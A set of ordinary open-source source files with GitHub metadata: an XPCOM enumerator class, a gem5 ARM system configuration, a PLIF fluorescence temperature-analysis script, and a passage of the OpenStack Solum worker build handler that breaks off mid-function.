from xpcom import components
# This class is created by Python components when it
# needs to return an enumerator.
# For example, a component may implement a function:
#   nsISimpleEnumerator enumSomething();
# This code could simply say:
#   return SimpleEnumerator([something1, something2, something3])
class SimpleEnumerator:
    _com_interfaces_ = [components.interfaces.nsISimpleEnumerator]

    def __init__(self, data):
        self._data = data
        self._index = 0

    def hasMoreElements(self):
        return self._index < len(self._data)

    def getNext(self):
        self._index = self._index + 1
        return self._data[self._index - 1]
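
# A usage sketch (hedged: `MyComponent` and `nsIMyComponent` are hypothetical
# names, not part of this module):
#
#     class MyComponent:
#         _com_interfaces_ = [components.interfaces.nsIMyComponent]
#         def enumSomething(self):
#             return SimpleEnumerator(["something1", "something2", "something3"])
#
# XPCOM callers then iterate via the hasMoreElements()/getNext() protocol.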
|
{
"content_hash": "ab1e43faedf641fb0490a966d8736efd",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 66,
"avg_line_length": 31.428571428571427,
"alnum_prop": 0.6893939393939394,
"repo_name": "dgomez10/xanon",
"id": "d3fb89a9d7573bf648b6a6086fc8240568a662b1",
"size": "2391",
"binary": false,
"copies": "31",
"ref": "refs/heads/master",
"path": "SDK/bindings/xpcom/python/xpcom/server/enumerator.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ApacheConf",
"bytes": "5767"
},
{
"name": "Assembly",
"bytes": "602"
},
{
"name": "C",
"bytes": "1834867"
},
{
"name": "C++",
"bytes": "6956615"
},
{
"name": "CSS",
"bytes": "704096"
},
{
"name": "Go",
"bytes": "228"
},
{
"name": "HTML",
"bytes": "5861682"
},
{
"name": "Haskell",
"bytes": "8060"
},
{
"name": "IDL",
"bytes": "84486"
},
{
"name": "Java",
"bytes": "113453"
},
{
"name": "JavaScript",
"bytes": "328606"
},
{
"name": "Makefile",
"bytes": "9270"
},
{
"name": "PHP",
"bytes": "2262806"
},
{
"name": "Perl",
"bytes": "422783"
},
{
"name": "Python",
"bytes": "5266626"
},
{
"name": "R",
"bytes": "3737"
},
{
"name": "SQLPL",
"bytes": "1764"
},
{
"name": "Shell",
"bytes": "45175"
},
{
"name": "Visual Basic",
"bytes": "3078"
}
],
"symlink_target": ""
}
|
from m5.params import *
from System import System
class ArmMachineType(Enum):
    map = {'RealView_EB': 827,
           'RealView_PBX': 1901,
           'VExpress_ELT': 2272,
           'VExpress_CA9': 2272,
           'VExpress_EMM': 2272,
           'VExpress_EMM64': 2272}

class ArmSystem(System):
    type = 'ArmSystem'
    cxx_header = "arch/arm/system.hh"
    load_addr_mask = 0xffffffff
    multi_proc = Param.Bool(True, "Multiprocessor system?")
    boot_loader = Param.String("", "File that contains the boot loader code if any")
    gic_cpu_addr = Param.Addr(0, "Address of the GIC CPU interface")
    flags_addr = Param.Addr(0, "Address of the flags register for MP booting")
    have_security = Param.Bool(False,
        "True if Security Extensions are implemented")
    have_virtualization = Param.Bool(False,
        "True if Virtualization Extensions are implemented")
    have_lpae = Param.Bool(False, "True if LPAE is implemented")
    have_generic_timer = Param.Bool(False,
        "True if the Generic Timer extension is implemented")
    highest_el_is_64 = Param.Bool(False,
        "True if the register width of the highest implemented exception level "
        "is 64 bits (ARMv8)")
    reset_addr_64 = Param.Addr(0x0,
        "Reset address if the highest implemented exception level is 64 bits "
        "(ARMv8)")
    phys_addr_range_64 = Param.UInt8(40,
        "Supported physical address range in bits when using AArch64 (ARMv8)")
    have_large_asid_64 = Param.Bool(False,
        "True if ASID is 16 bits in AArch64 (ARMv8)")

class LinuxArmSystem(ArmSystem):
    type = 'LinuxArmSystem'
    cxx_header = "arch/arm/linux/system.hh"
    load_addr_mask = 0x0fffffff
    machine_type = Param.ArmMachineType('RealView_PBX',
        "Machine id from http://www.arm.linux.org.uk/developer/machines/")
    atags_addr = Param.Addr("Address where default atags structure should " \
                            "be written")
    boot_release_addr = Param.Addr(0xfff8, "Address where secondary CPUs " \
                                   "spin waiting for boot in the loader")
    dtb_filename = Param.String("",
        "File that contains the Device Tree Blob. Don't use DTB if empty.")
    early_kernel_symbols = Param.Bool(False,
        "enable early kernel symbol tables before MMU")
    enable_context_switch_stats_dump = Param.Bool(False,
        "enable stats/task info dumping at context switch boundaries")
    panic_on_panic = Param.Bool(False, "Trigger a gem5 panic if the " \
                                "guest kernel panics")
    panic_on_oops = Param.Bool(False, "Trigger a gem5 panic if the " \
                               "guest kernel oopses")
|
{
"content_hash": "75c190498127e76c7b860cdc49ae5503",
"timestamp": "",
"source": "github",
"line_count": 58,
"max_line_length": 119,
"avg_line_length": 46.62068965517241,
"alnum_prop": 0.6372041420118343,
"repo_name": "wnoc-drexel/gem5-stable",
"id": "a803a251b226ca3d655d8339cc7ff0253977886b",
"size": "4808",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "src/arch/arm/ArmSystem.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Assembly",
"bytes": "239800"
},
{
"name": "C",
"bytes": "957228"
},
{
"name": "C++",
"bytes": "13915041"
},
{
"name": "CSS",
"bytes": "9813"
},
{
"name": "Emacs Lisp",
"bytes": "1969"
},
{
"name": "Groff",
"bytes": "11130043"
},
{
"name": "HTML",
"bytes": "132838214"
},
{
"name": "Java",
"bytes": "3096"
},
{
"name": "Makefile",
"bytes": "20709"
},
{
"name": "PHP",
"bytes": "10107"
},
{
"name": "Perl",
"bytes": "36183"
},
{
"name": "Protocol Buffer",
"bytes": "3246"
},
{
"name": "Python",
"bytes": "3739380"
},
{
"name": "Shell",
"bytes": "49333"
},
{
"name": "Visual Basic",
"bytes": "2884"
}
],
"symlink_target": ""
}
|
"""
PLIF Temperature Calculator
Created on Wed Feb 3 16:51:48 2016
@author: Darren Banks
plif_temperature calculates temperature in a plane of rhodamine-B solution
based on the intensity at which the rhodamine fluoresces under planar laser
irradiation. plif_temperature requires the module plif_tools to run.
"""
import logging
import matplotlib.pyplot as plt
import numpy as np
from os import makedirs
from os.path import exists
import plif_tools as pt
import sys
""" Logging setup """
logger = logging.getLogger('plif')
logger.setLevel(logging.DEBUG)
con_format = '%(asctime)s - %(name)s - %(levelname)-8s: %(message)s'
console_format = logging.Formatter(con_format, datefmt='%H:%M:%S')
console_handler = logging.StreamHandler()
console_handler.setLevel(logging.DEBUG)
console_handler.setFormatter(console_format)
logger.addHandler(console_handler)
""" Create console handler. """
log_file = 'C:\\Users\\Darren\\Documents\\GitHub\\PLIFluorescence\\debug.log'
if not exists(log_file):
    file = open(log_file, 'a')
    file.close()
log_format = '%(asctime)s %(name)-24s %(levelname)-8s %(message)s'
logfile_format = logging.Formatter(log_format, datefmt='%Y-%m-%d %H:%M:%S')
file_handler = logging.FileHandler(log_file)
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(logfile_format)
logger.addHandler(file_handler)
""" Create debug logging file handler. """
info_file = 'C:\\Users\\Darren\\Documents\\GitHub\\PLIFluorescence\\info.log'
if not exists(info_file):
    file = open(info_file, 'a')
    file.close()
info_handler = logging.FileHandler(info_file, mode='w')
info_handler.setLevel(logging.INFO)
info_handler.setFormatter(logfile_format)
logger.addHandler(info_handler)
""" Creating info logging file handler. """
logger.debug('Starting.')
plt.ioff()
""" Suppressing graph output to the IPython console. """
""" Literals """
num_reference_images = 100
""" Number of frames to establish base fluorescence within images. """
grid_number = 40
""" Number of grid cells applied to the images for analysis. """
want_plots = False
""" If want_plots is False, the temperature surface plots will
not be produced. Generally a time-saving value if False.
"""
plot_path = 'figures 2'
""" The folder name that will contain temperatures plots. """
plot_type = '.png'
""" Image file extension for saving results. """
results = 'temperatures 2.xlsx'
""" Name of MS Excel file to save results. """
statistics = 'statistics 2.xlsx'
""" Name of MS Excel file to save summarizing statistics. """
plot_width = 4
""" The base width in inches for output plots. """
plt.rc('font', family='serif', size=24.0, serif='Times New Roman')
""" Set the default font for plotting to Times New Roman, so it
matches that used in the paper.
"""
""" Image import """
root_directory = ('I:\\PLIF\\test 11\\images 2 - Copy')
if not exists(root_directory):
    logger.error('Experiment directory does not exist!')
    sys.exit()
logger.info('Directory: ' + root_directory)
""" Directory containing experiment images and calibration. """
figure_path = root_directory + '\\' + plot_path
""" Directory for result figures to be saved. """
if not exists(figure_path):
    makedirs(figure_path)
[image_path, calib_paths] = pt.exptDirectory(root_directory, '', 'cal')
all_images = pt.listImages(image_path)
all_averages = pt.gridAverage(all_images, grid_number)
reference_averages = all_averages[:num_reference_images]
image_averages = all_averages[num_reference_images:]
logger.debug('First {} images used as reference'.format(num_reference_images))
""" Take the RGB mean value for the images in each grid square. """
aspect_ratio = pt.getAspectRatio(all_images[0])
logger.info('File import complete')
""" Calibration of intensity to temperature """
mean_reference_averages = np.mean(reference_averages)
""" Take the average of each grid square over the collection of
calibration images.
"""
calib_temperatures = [path[-2:] for path in calib_paths]
calib_image_sets = [pt.listImages(path) for path in calib_paths]
""" Gather the images located in the calibration directories. """
calib_averages = pt.getCalibrationAverages(calib_image_sets,
calib_temperatures, grid_number)
""" Apply grid and get RGB averages for each calibration temperature. """
grid_slopes = pt.getGridSlopes(calib_averages, calib_temperatures)
logger.info('Temperature calibration complete.')
""" Calculating temperature """
delta_intensity = image_averages - mean_reference_averages
delta_temperature = delta_intensity / grid_slopes
delta_temperature.to_excel(image_path+'\\temperature_deltas.xlsx')
plot_temperatures = delta_intensity / grid_slopes + int(calib_temperatures[0])
""" Calculate the temperature based on the difference between the
calibration and the image's grid RGB averages.
"""
if min(plot_temperatures.min()) < 25:
    logger.warning('Subcooled, possibly erroneous temperatures')
plot_temperatures.to_excel(image_path + '\\' + results)
""" Save the calculated temperatures for analysis. """
""" Reporting the temperature statistics. """
stats_list = pt.getTemperatureStats(plot_temperatures, image_path, statistics)
pt.plotTemperatureStats(stats_list, image_path, plot_type)
""" Plotting temperature contour in each video frame. """
if want_plots:
    z_minimum = 25
    z_maximum = 100
    """ User sets the graph maximum and minimum temperature values. """
    plot_range = np.arange(grid_number)
    x_grid, y_grid = np.meshgrid(plot_range, plot_range)
    """ Setting up the X and Y array for plotting purposes. """
    temperature_intervals = np.arange(z_minimum, z_maximum, 1)
    """ The temperature range to scale the color map. """
    fig = plt.figure(figsize=(2.5*plot_width, 2.0*plot_width/aspect_ratio))
    for index, row in plot_temperatures.iterrows():
        frame_title = 'Frame {}'.format(index-99)
        """ Title of each plot corresponds to its frame number in video. """
        plot_temperature_array = np.reshape(row, (grid_number, grid_number))
        """ plot_temperature_array is the calculated temperature for a
        3-D surface plot. It takes the row of the temperature
        dataFrame and fits it to the x- and y-grid set on the
        image during analysis.
        """
        plt.contourf(x_grid, y_grid, plot_temperature_array,
                     temperature_intervals, cmap='jet', extend='both',
                     vmin=z_minimum, vmax=z_maximum)
        plt.title(frame_title)
        plt.xticks(np.arange(0, grid_number, 1))
        plt.yticks(np.arange(0, grid_number, 1))
        plt.colorbar()
        plt.grid(color='k', linestyle='solid', which='both')
        """ Creating and formatting the plot with a colormap, the
        previously set Z limits, ticks with intervals of 1,
        and a black grid.
        """
        """ Save the figure within a subfolder of the initial
        directory, and then clear the figure.
        """
        plt.savefig(figure_path + '\\' + frame_title + plot_type, dpi=50)
        plt.clf()
        if np.mod(index-99, 100) == 0:
            logger.debug('Frame {} graphed'.format(index-99))
    """ Iterating over the frames. """
    plt.close('all')
if not want_plots:
logger.info('Temperatures not plotted.')
logger.info('Complete\n')
|
{
"content_hash": "7ab5fc09f3c38eaf082b48ddc97de6ec",
"timestamp": "",
"source": "github",
"line_count": 240,
"max_line_length": 78,
"avg_line_length": 30.820833333333333,
"alnum_prop": 0.6897390834121941,
"repo_name": "darren6337/PLIFluorescence",
"id": "52e65cc3f4e9b642a9c4ffc265485950dbd0dedb",
"size": "7421",
"binary": false,
"copies": "1",
"ref": "refs/heads/PLIF-20160227",
"path": "plif_temperature.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "23154"
}
],
"symlink_target": ""
}
|
"""Solum Worker shell handler."""
import ast
import base64
import json
import os
import random
import shelve
import string
import subprocess
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import uuidutils
from sqlalchemy import exc as sqla_exc
import solum
from solum.common import clients
from solum.common import exception
from solum.common import repo_utils
from solum.conductor import api as conductor_api
from solum.deployer import api as deployer_api
from solum.i18n import _
from solum import objects
from solum.objects import assembly
from solum.objects import image
from solum.privileged import rootwrap as priv_rootwrap
import solum.uploaders.local as local_uploader
import solum.uploaders.swift as swift_uploader
LOG = logging.getLogger(__name__)
ASSEMBLY_STATES = assembly.States
IMAGE_STATES = image.States
cfg.CONF.import_opt('task_log_dir', 'solum.worker.config', group='worker')
cfg.CONF.import_opt('proj_dir', 'solum.worker.config', group='worker')
cfg.CONF.import_opt('param_file_path', 'solum.worker.config', group='worker')
cfg.CONF.import_opt('log_upload_strategy', 'solum.worker.config',
group='worker')
cfg.CONF.import_opt('image_storage', 'solum.worker.config', group='worker')
cfg.CONF.import_opt('temp_url_secret', 'solum.worker.config', group='worker')
cfg.CONF.import_opt('temp_url_protocol', 'solum.worker.config', group='worker')
cfg.CONF.import_opt('temp_url_ttl', 'solum.worker.config', group='worker')
def upload_task_log(ctxt, original_path, resource, build_id, stage):
strategy = cfg.CONF.worker.log_upload_strategy
LOG.debug("User log upload strategy: %s" % strategy)
uploader = {
'local': local_uploader.LocalStorage,
'swift': swift_uploader.SwiftUpload,
}.get(strategy, local_uploader.LocalStorage)
uploader(ctxt, original_path, resource, build_id, stage).upload_log()
def job_update_notification(ctxt, build_id, status=None, description=None,
created_image_id=None, docker_image_name=None,
assembly_id=None):
"""send a status update to the conductor."""
LOG.debug('build id:%s %s (%s) %s %s %s' % (build_id, status, description,
created_image_id,
docker_image_name,
assembly_id),
context=solum.TLS.trace)
conductor_api.API(context=ctxt).build_job_update(build_id, status,
description,
created_image_id,
docker_image_name,
assembly_id)
def get_assembly_by_id(ctxt, assembly_id):
return solum.objects.registry.Assembly.get_by_id(ctxt, assembly_id)
def get_image_by_id(ctxt, image_id):
return solum.objects.registry.Image.get_by_id(ctxt, image_id)
def get_app_by_assem_id(ctxt, assembly_id):
assem = get_assembly_by_id(ctxt, assembly_id)
if assem:
plan = solum.objects.registry.Plan.get_by_id(ctxt, assem.plan_id)
app = solum.objects.registry.App.get_by_id(ctxt, plan.uuid)
return app
def get_parameter_by_assem_id(ctxt, assembly_id):
assem = get_assembly_by_id(ctxt, assembly_id)
param_obj = solum.objects.registry.Parameter.get_by_plan_id(ctxt,
assem.plan_id)
if not param_obj:
plan = solum.objects.registry.Plan.get_by_id(ctxt, assem.plan_id)
app = solum.objects.registry.App.get_by_id(ctxt, plan.uuid)
app = json.loads(app.raw_content)
param_obj = app.get('parameters', {})
return param_obj
def update_assembly_status(ctxt, assembly_id, status):
if assembly_id is None:
return
LOG.debug('Updating assembly %s status to %s' % (assembly_id, status))
data = {'status': status}
conductor_api.API(context=ctxt).update_assembly(assembly_id, data)
try:
update_wf_and_app_status(ctxt, assembly_id, status)
except Exception as e:
LOG.exception(e)
def update_wf_and_app_status(ctxt, assembly_id, status):
# Update workflow and app objects
status_data = dict()
status_data['status'] = status
try:
wf = objects.registry.Workflow.get_by_assembly_id(assembly_id)
objects.registry.Workflow.update_and_save(ctxt, wf.id, status_data)
except sqla_exc.SQLAlchemyError as ex:
LOG.error("Failed to update workflow corresponding to assembly %s"
% assembly_id)
LOG.exception(ex)
if wf is not None:
try:
app = objects.registry.App.get_by_id(ctxt, wf.app_id)
objects.registry.App.update_and_save(ctxt, app.id, status_data)
except sqla_exc.SQLAlchemyError as ex:
LOG.error("Failed to update app status and app URL: %s" % app.id)
LOG.exception(ex)
def update_lp_status(ctxt, image_id, name, status, external_ref=None,
docker_image_name=None):
if image_id is None:
return
LOG.debug('Updating languagepack %s status to %s and external_ref to %s'
% (name, status, external_ref))
conductor_api.API(context=ctxt).update_image(image_id, status,
external_ref,
docker_image_name)
def get_lp_access_method(lp_project_id):
if lp_project_id == cfg.CONF.api.operator_project_id:
return 'operator'
else:
return 'custom'
class Handler(object):
def echo(self, ctxt, message):
LOG.debug("%s" % message)
@exception.wrap_keystone_exception
def get_du_details(self, ctxt, du_id):
du_loc = None
du_name = None
du_image_backend = cfg.CONF.worker.image_storage
if du_image_backend.lower() == 'glance':
img = clients.OpenStackClients(ctxt).glance().images.get(du_id)
du_loc = img.id
du_name = img.name
elif du_image_backend.lower() == 'swift':
raise exception.NotImplemented()
else:
LOG.error("Invalid image storage option.")
raise exception.ResourceNotFound()
return du_loc, du_name
@exception.wrap_keystone_exception
def _get_environment(self, ctxt, git_info, assembly_id=None,
test_cmd=None, run_cmd=None, lp_access=None):
source_uri = git_info['source_url']
# create a minimal environment
user_env = {}
private = git_info.get('private', False)
ssh_key = git_info.get('private_ssh_key', '')
if private and ssh_key:
user_env['REPO_DEPLOY_KEYS'] = ssh_key
for var in ['PATH', 'LOGNAME', 'LANG', 'HOME', 'USER', 'TERM']:
if var in os.environ:
user_env[var] = os.environ[var]
if assembly_id is not None:
assem = get_assembly_by_id(ctxt, assembly_id)
user_env['ASSEMBLY_ID'] = str(assem.uuid)
else:
str_assem = (''.join(random.choice(string.ascii_uppercase)
for i in range(20)))
user_env['ASSEMBLY_ID'] = str_assem
user_env['IMAGE_STORAGE'] = cfg.CONF.worker.image_storage
user_env['DELETE_LOCAL_CACHE'] = cfg.CONF.worker.delete_local_cache
if cfg.CONF.worker.image_storage == 'docker_registry':
if cfg.CONF.worker.docker_reg_endpoint is None:
LOG.debug("DU upload set to docker registry,")
LOG.debug("but docker registry endpoint is not set.")
LOG.debug("Setting it to 127.0.0.1")
cfg.CONF.worker.docker_reg_endpoint = '127.0.0.1'
user_env['DOCKER_REGISTRY'] = cfg.CONF.worker.docker_reg_endpoint
else:
client_region_name = clients.get_client_option('swift',
'region_name')
user_env['OS_AUTH_TOKEN'] = ctxt.auth_token
user_env['OS_AUTH_URL'] = ctxt.auth_url or ''
user_env['OS_REGION_NAME'] = client_region_name
kc = clients.OpenStackClients(ctxt).keystone()
user_env['OS_IMAGE_URL'] = kc.client.service_catalog.url_for(
service_type='image',
interface='publicURL')
user_env['OS_STORAGE_URL'] = kc.client.service_catalog.url_for(
service_type='object-store',
interface='publicURL',
region_name=client_region_name)
user_env['TEMP_URL_SECRET'] = cfg.CONF.worker.temp_url_secret
user_env['TEMP_URL_PROTOCOL'] = cfg.CONF.worker.temp_url_protocol
user_env['TEMP_URL_TTL'] = cfg.CONF.worker.temp_url_ttl
user_env['OPR_LP_DOWNLOAD_STRATEGY'] = (
cfg.CONF.worker.operator_lp_download_strategy)
# Get LP Operator context for downloading operator LPs
lp_kc = clients.OpenStackClients(None).keystone().lp_admin_client
# Get the auth ref from session
auth_ref = lp_kc.session.auth.get_auth_ref(lp_kc.session)
# Get service_catalog
service_catalog = auth_ref.service_catalog
user_env['OPER_AUTH_TOKEN'] = lp_kc.session.get_token()
user_env['OPER_OS_STORAGE_URL'] = service_catalog.url_for(
service_type='object-store',
interface='publicURL',
region_name=client_region_name)
if test_cmd is not None:
user_env['TEST_CMD'] = test_cmd
if run_cmd is not None:
user_env['RUN_CMD'] = run_cmd
user_env['PROJECT_ID'] = ctxt.project_id
user_env['BUILD_ID'] = uuidutils.generate_uuid()
user_env['SOLUM_TASK_DIR'] = cfg.CONF.worker.task_log_dir
if lp_access is not None:
user_env['ACCESS'] = lp_access
params_env = self._get_parameter_env(ctxt, source_uri, assembly_id,
user_env['BUILD_ID'])
user_env.update(params_env)
return user_env
@property
def proj_dir(self):
if cfg.CONF.worker.proj_dir:
return cfg.CONF.worker.proj_dir
return os.path.abspath(os.path.join(os.path.dirname(__file__),
'..', '..', '..'))
def _get_build_command(self, ctxt, stage, source_uri, name,
base_image_id, source_format, image_format,
commit_sha, artifact_type=None, lp_image_tag=None):
# map the input formats to script paths.
# TODO(asalkeld) we need an "auto".
pathm = {'heroku': 'lp-cedarish',
'dib': 'diskimage-builder',
'dockerfile': 'lp-dockerfile',
'chef': 'lp-chef',
'docker': 'docker',
'qcow2': 'docker',
'vm': 'docker'}
if base_image_id == 'auto' and image_format == 'qcow2':
base_image_id = 'cedarish'
build_app_path = os.path.join(self.proj_dir, 'contrib',
pathm.get(source_format, 'lp-cedarish'),
pathm.get(image_format, 'docker'))
if artifact_type == 'language_pack':
build_lp = os.path.join(build_app_path, 'build-lp')
return [build_lp, source_uri, name, ctxt.project_id]
if stage == 'unittest':
build_app = os.path.join(build_app_path, 'unittest-app')
return [build_app, source_uri, commit_sha, ctxt.project_id,
base_image_id, lp_image_tag]
elif stage == 'build':
build_app = os.path.join(build_app_path, 'build-app')
return [build_app, source_uri, commit_sha, name, ctxt.project_id,
base_image_id, lp_image_tag]
def _get_parameter_env(self, ctxt, source_uri, assembly_id, build_id):
param_env = {}
if assembly_id is None:
return param_env
param_obj = get_parameter_by_assem_id(ctxt, assembly_id)
if param_obj is None:
return param_env
user_param_file = '/'.join([cfg.CONF.worker.param_file_path,
build_id, 'user_params'])
solum_param_file = '/'.join([cfg.CONF.worker.param_file_path,
build_id, 'solum_params'])
try:
os.makedirs(os.path.dirname(user_param_file), 0o700)
except OSError as ex:
LOG.error("Error creating dirs to write out param files, %s" % ex)
return param_env
def _sanitize_param(s):
if s is None:
return ''
elif isinstance(s, str):
# Handles the case of exporting a var with a multi-line string
return ''.join(['"', s.strip('\n').replace('"', '\\"'), '"'])
else:
return str(s)
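# For example (illustrative values): _sanitize_param('my "quoted" value')
# yields '"my \"quoted\" value"', so the value survives the bash export
# statement written below; _sanitize_param(None) yields ''.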
with open(user_param_file, 'w') as f:
f.write("#!/bin/bash\n")
if param_obj.get('user_params'):
for k, v in param_obj['user_params'].items():
if k and k.startswith('_SYSTEM'):
# Variables for control purpose, e.g. _SYSTEM_USE_DRONE
param_env[k] = _sanitize_param(v)
else:
f.write("export %s=%s\n" % (k, _sanitize_param(v)))
with open(solum_param_file, 'w') as f:
f.write("#!/bin/bash\n")
if param_obj.get('solum_params'):
for k, v in param_obj['solum_params'].items():
if k == 'REPO_DEPLOY_KEYS':
# Pass in deploy key as an environment variable
param_env[k] = self._get_private_key(v, source_uri)
f.write("export %s=%s\n" % (k, _sanitize_param(v)))
param_env['USER_PARAMS'] = user_param_file
param_env['SOLUM_PARAMS'] = solum_param_file
return param_env
def launch_workflow(self, ctxt, build_id, git_info, ports, name,
base_image_id, source_format, image_format,
assembly_id, workflow, test_cmd, run_cmd, du_id):
if 'unittest' in workflow:
if self._do_unittest(ctxt, build_id, git_info, name, base_image_id,
source_format, image_format, assembly_id,
test_cmd) != 0:
return
du_image_loc = None
du_image_name = None
if 'build' in workflow:
du_image_loc, du_image_name = self._do_build(
ctxt, build_id, git_info, name, base_image_id, source_format,
image_format, assembly_id, run_cmd)
if 'deploy' in workflow:
if du_id:
du_image_loc, du_image_name = self.get_du_details(ctxt, du_id)
if du_image_loc and du_image_name:
self._do_deploy(ctxt, assembly_id, ports, du_image_loc,
du_image_name)
else:
LOG.warning("Deploy called without DU details. "
"Cannot continue.")
return
if 'scale' in workflow:
self._do_scale(ctxt, assembly_id)
def build(self, ctxt, build_id, git_info, name, base_image_id,
source_format, image_format, assembly_id, run_cmd):
self._do_build(ctxt, build_id, git_info, name, base_image_id,
source_format, image_format, assembly_id, run_cmd)
def unittest(self, ctxt, build_id, git_info, name, base_image_id,
source_format, image_format, assembly_id, test_cmd):
self._do_unittest(ctxt, build_id, git_info, name, base_image_id,
source_format, image_format, assembly_id, test_cmd)
def _do_deploy(self, ctxt, assembly_id, ports, du_image_loc,
du_image_name):
app = get_app_by_assem_id(ctxt, assembly_id)
LOG.debug("Deploying app %s %s" % (app.name, app.id))
deployer_api.API(context=ctxt).deploy(assembly_id=assembly_id,
image_loc=du_image_loc,
image_name=du_image_name,
ports=ports)
def _do_scale(self, ctxt, assembly_id):
app = get_app_by_assem_id(ctxt, assembly_id)
LOG.debug("Scaling app %s %s" % (app.name, app.id))
deployer_api.API(context=ctxt).scale(assembly_id=assembly_id)
def _do_build(self, ctxt, build_id, git_info, name, base_image_id,
source_format, image_format, assembly_id, run_cmd):
update_assembly_status(ctxt, assembly_id, ASSEMBLY_STATES.BUILDING)
app = get_app_by_assem_id(ctxt, assembly_id)
LOG.debug("Building app %s %s" % (app.name, app.id))
solum.TLS.trace.clear()
solum.TLS.trace.import_context(ctxt)
source_uri = git_info['source_url']
commit_sha = git_info.get('commit_sha', '')
private = git_info.get('private', False)
ssh_key = git_info.get('private_ssh_key', '')
# If the repo is private, make sure private ssh key is provided
if private and not ssh_key:
LOG.warning("Error building due to missing private ssh key."
" assembly ID: %s" % assembly_id)
job_update_notification(ctxt, build_id, IMAGE_STATES.ERROR,
description='private ssh key missing',
assembly_id=assembly_id)
update_assembly_status(ctxt, assembly_id,
ASSEMBLY_STATES.ERROR)
return
image_tag = ''
lp_access = ''
if base_image_id != 'auto':
image = objects.registry.Image.get_lp_by_name_or_uuid(
ctxt, base_image_id, include_operators_lp=True)
if (not image or not image.project_id or not image.status or
not image.external_ref or not image.docker_image_name or
image.status.lower() != 'ready'):
LOG.warning("Error building due to language pack not ready."
" assembly ID: %s" % assembly_id)
job_update_notification(ctxt, build_id, IMAGE_STATES.ERROR,
description='language pack not ready',
assembly_id=assembly_id)
update_assembly_status(ctxt, assembly_id,
ASSEMBLY_STATES.ERROR)
return
base_image_id = image.external_ref
image_tag = image.docker_image_name
lp_access = get_lp_access_method(image.project_id)
build_cmd = self._get_build_command(ctxt, 'build', source_uri,
name, base_image_id,
source_format, image_format,
commit_sha,
lp_image_tag=image_tag)
solum.TLS.trace.support_info(build_cmd=' '.join(build_cmd),
assembly_id=assembly_id)
user_env = {}
try:
user_env = self._get_environment(ctxt,
git_info,
assembly_id=assembly_id,
run_cmd=run_cmd,
lp_access=lp_access)
except exception.SolumException as env_ex:
LOG.exception(env_ex)
job_update_notification(ctxt, build_id, IMAGE_STATES.ERROR,
description=str(env_ex),
assembly_id=assembly_id)
log_env = user_env.copy()
if 'OS_AUTH_TOKEN' in log_env:
del log_env['OS_AUTH_TOKEN']
if 'OPER_AUTH_TOKEN' in log_env:
del log_env['OPER_AUTH_TOKEN']
if 'OPER_OS_STORAGE_URL' in log_env:
del log_env['OPER_OS_STORAGE_URL']
solum.TLS.trace.support_info(environment=log_env)
job_update_notification(ctxt, build_id, IMAGE_STATES.BUILDING,
description='Starting the image build',
assembly_id=assembly_id)
# TODO(datsun180b): Associate log with assembly properly
logpath = "%s/%s-%s.log" % (user_env['SOLUM_TASK_DIR'],
'build',
user_env['BUILD_ID'])
LOG.debug("Build logs for app %s stored at %s" % (app.name, logpath))
out = None
assem = None
if assembly_id is not None:
assem = get_assembly_by_id(ctxt, assembly_id)
if assem.status == ASSEMBLY_STATES.DELETING:
return
try:
out = subprocess.Popen(build_cmd,
env=user_env,
stdout=subprocess.PIPE).communicate()[0]
except (OSError, ValueError) as subex:
LOG.exception(subex)
job_update_notification(ctxt, build_id, IMAGE_STATES.ERROR,
description=str(subex),
assembly_id=assembly_id)
update_assembly_status(ctxt, assembly_id, ASSEMBLY_STATES.ERROR)
return
if assem is not None:
assem.type = 'app'
wf = objects.registry.Workflow.get_by_assembly_id(assem.id)
upload_task_log(ctxt, logpath, assem, wf.id, 'build')
'''
we expect two lines in the output that look like:
created_image_id=<location of DU>
docker_image_name=<DU name>
The DU location is:
DU's swift tempUrl if backend is 'swift';
DU's UUID in glance if backend is 'glance';
DU's docker registry location if backend is 'docker_registry'
'''
du_image_loc = None
docker_image_name = None
for line in out.split('\n'):
# Don't break out early; the last matching
# line holds the expected value
if line.startswith('created_image_id'):
solum.TLS.trace.support_info(build_out_line=line)
du_image_loc = line.replace('created_image_id=', '').strip()
elif line.startswith('docker_image_name'):
docker_image_name = line.replace('docker_image_name=', '')
if not du_image_loc or not docker_image_name:
job_update_notification(ctxt, build_id, IMAGE_STATES.ERROR,
description='image not created',
assembly_id=assembly_id)
update_assembly_status(ctxt, assembly_id, ASSEMBLY_STATES.ERROR)
return
else:
job_update_notification(ctxt, build_id, IMAGE_STATES.READY,
description='built successfully',
created_image_id=du_image_loc,
docker_image_name=docker_image_name,
assembly_id=assembly_id)
update_assembly_status(ctxt, assembly_id, ASSEMBLY_STATES.BUILT)
return (du_image_loc, docker_image_name)
def _do_unittest(self, ctxt, build_id, git_info, name, base_image_id,
source_format, image_format, assembly_id, test_cmd):
if test_cmd is None:
LOG.debug("Unit test command is None; skipping unittests.")
return 0
app = get_app_by_assem_id(ctxt, assembly_id)
LOG.debug("Unit testing for app %s %s" % (app.name, app.id))
commit_sha = git_info.get('commit_sha', '')
status_url = git_info.get('status_url')
repo_token = git_info.get('repo_token')
update_assembly_status(ctxt, assembly_id, ASSEMBLY_STATES.UNIT_TESTING)
image_tag = ''
lp_access = ''
if base_image_id != 'auto':
image = objects.registry.Image.get_lp_by_name_or_uuid(
ctxt, base_image_id, include_operators_lp=True)
if (not image or not image.project_id or not image.status or
not image.external_ref or not image.docker_image_name or
image.status.lower() != 'ready'):
LOG.warning("Error running unittest due to language pack"
" not ready. assembly ID: %s" % assembly_id)
update_assembly_status(ctxt, assembly_id,
ASSEMBLY_STATES.ERROR)
return
base_image_id = image.external_ref
image_tag = image.docker_image_name
lp_access = get_lp_access_method(image.project_id)
git_url = git_info['source_url']
command = self._get_build_command(ctxt, 'unittest', git_url, name,
base_image_id,
source_format, image_format,
commit_sha, lp_image_tag=image_tag)
solum.TLS.trace.clear()
solum.TLS.trace.import_context(ctxt)
user_env = self._get_environment(ctxt,
git_info,
assembly_id=assembly_id,
test_cmd=test_cmd,
lp_access=lp_access)
log_env = user_env.copy()
if 'OS_AUTH_TOKEN' in log_env:
del log_env['OS_AUTH_TOKEN']
if 'OPER_AUTH_TOKEN' in log_env:
